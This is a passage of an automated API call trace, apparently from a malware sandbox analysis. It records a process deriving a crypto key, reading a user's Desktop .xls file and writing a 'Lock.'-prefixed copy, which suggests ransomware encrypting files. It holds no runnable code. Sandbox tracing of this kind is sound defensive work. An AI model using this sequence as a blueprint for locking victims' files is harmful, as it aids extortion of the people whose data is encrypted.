wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0089.635] CryptHashData (hHash=0x9a3c40, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0089.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.635] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0089.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0089.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0089.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0089.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9ec8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0089.635] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3c40, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4040) returned 1 [0089.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.636] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.636] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0089.636] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.636] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0089.636] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0089.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7140, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0089.636] CryptDestroyHash (hHash=0x9a3c40) returned 1 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0089.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0089.637] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0089.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0089.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/BlDya8Gp-4HPz6uNsS.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\bldya8gp-4hpz6unss.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0089.638] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.638] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0089.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0089.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0089.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0089.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0089.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0089.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75b28 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.639] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75b28 | out: hHeap=0x2af0000) returned 1 [0089.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.640] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.BlDya8Gp-4HPz6uNsS.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.bldya8gp-4hpz6unss.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0089.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0089.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0089.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0089.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0089.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0089.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0089.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x39c4020 [0089.697] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0089.697] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xd39f, lpOverlapped=0x0) returned 1 [0089.701] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0089.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0089.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0089.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd39f) returned 0x2a7a130 [0089.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39c4020 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0089.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd39f) returned 0x2a874d8 [0089.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0089.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0089.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0089.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0089.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd39f) returned 0x2a7a130 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0089.707] PeekMessageW (in: 